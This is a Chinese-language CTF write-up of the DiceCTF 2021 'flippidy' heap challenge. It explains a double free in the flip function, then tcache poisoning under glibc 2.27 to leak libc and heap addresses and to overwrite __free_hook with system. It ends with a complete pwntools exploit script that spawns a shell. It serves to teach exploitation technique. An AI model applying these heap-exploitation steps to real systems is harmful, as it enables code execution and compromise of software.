DiceCTF 2021 flippidy
检查一下保护机制:
只有pie没有开
ida看下程序逻辑:
main函数:
第13行获取一个数字,第14行malloc(8*num)申请一个堆块,这个堆块将被用于保存其它堆块的堆址
然后进入while循环,首先是sub_4011c6函数:
会把数组off_404020里的字符指针指向的字符串依次打印出来,off_404020是这样的:
那么sub_4011c6()就打印出了一个菜单,菜单里有三个选项 (1)add (2)flip (3)exit
先看一下第36行调用的add函数:
只能malloc(0x30),意味着申请的堆块的大小是固定的
flip函数是这样的:
当note个数是奇数个(比如7)的时候,就会发生 free(notes[3]); free(notes[7-3-1])的现象,形成了double free
题目环境是glibc 2.27, tcache double free 比fast bin 要好利用
前面打印菜单的函数,是puts(off_402020[i]),如果能篡改off_402020数组里的数据,就可以任意地址读
看一下off_404020附近的情况:
拿到libc地址和堆址,方法是利用double free 申请到位于0x404020的chunk,并在0x404040处写上p64(0x404158)
因为此前0x404020处存储的数据是0x404040,意味着它这个chunk的next指针是0x404040,那么下一个tcache chunk将位于0x404040
如果在0x404040写上0x404158,那next的next就是0x404158,此后依次申请,就能拿到位于0x404158的chunk(0x404158上存储着一个很重要的堆址)
脚本如下:
add(0,"/bin/sh\x00") add(3,p64(0x404020)) flip() add(4,p64(0x404120)+p64(0x404158)+p64(0x4040a4)+p64(0x4040d6)+p64(0x404158))
此时 tcache链表是这样的 0x404040 -> 0x404158 -> heap_base+0x260
按照原定计划依次申请拿到0x404158处的chunk,在这个chunk里写上heap_base+0x50,这会让程序误以为用来存储堆块地址的堆块,在heap_base+0x50处,这个地址位于tcache结构体,后来再申请chunk会把堆址写到tcache结构体上,不过不打紧,小伤不致命
拿到 0x404158后(为保证heap_base+0x260的chunk的next指针指向0x404158,一定要add(0)),tcache链表是这样的 heap_base+0x260 -> 0x404158 -> heap_base +0x50
然后依次申请就拿到了tcache 结构体,改写它,使得下一个要申请的chunk位于__free_hook,我们在__free_hook上写system函数的地址
脚本如下:
add(5,p64(0)) add(0,p64(heap_base+0x50)) add(1,p64(heap_base+0x2b0)) add(1,p64(heap_base+0x260)) add(1,p64(0)*2+p64(free_hook)) add(1,p64(sys))
整个利用脚本是这样的:
#coding:utf-8 from pwn import * context.log_level="debug" sh=process("./flippidy") #sh=gdb.debug("./flippidy","b * 0x401378") #sh=remote("dicec.tf",31904) libc=ELF("./lib/libc.so.6") def add(idx,data): sh.sendlineafter(":","1") sh.sendlineafter("Index:",str(idx)) sh.sendlineafter("Content: ",data) def flip(): sh.sendlineafter(": ","2") sh.sendlineafter("be","7") add(0,"/bin/sh\x00") add(3,p64(0x404020)) flip() add(4,p64(0x404120)+p64(0x404158)+p64(0x4040a4)+p64(0x4040d6)+p64(0x404158)) #一并拿到libc基址和堆址 sh.recvuntil("\n\n") stdout=u64(sh.recv(6)+b"\x00\x00") sh.recvuntil("\n") heap_base=u64((sh.recvuntil('\n')[:-1]).ljust(8,b"\x00"))-0x260 libc_base=stdout-libc.sym['_IO_2_1_stdout_'] sys=libc_base+libc.sym['system'] free_hook=libc_base+libc.sym['__free_hook'] info(hex(libc_base)) info(hex(stdout)) info(hex(heap_base)) add(5,p64(0)) add(0,p64(heap_base+0x50)) #绕一圈,目的是跑到tcache结构体 add(1,p64(heap_base+0x2b0)) add(1,p64(heap_base+0x260)) add(1,p64(0)*2+p64(free_hook))#好了,拿到了tcache结构体 add(1,p64(sys)) flip() #pwnlib.gdb.attach(sh) sh.interactive()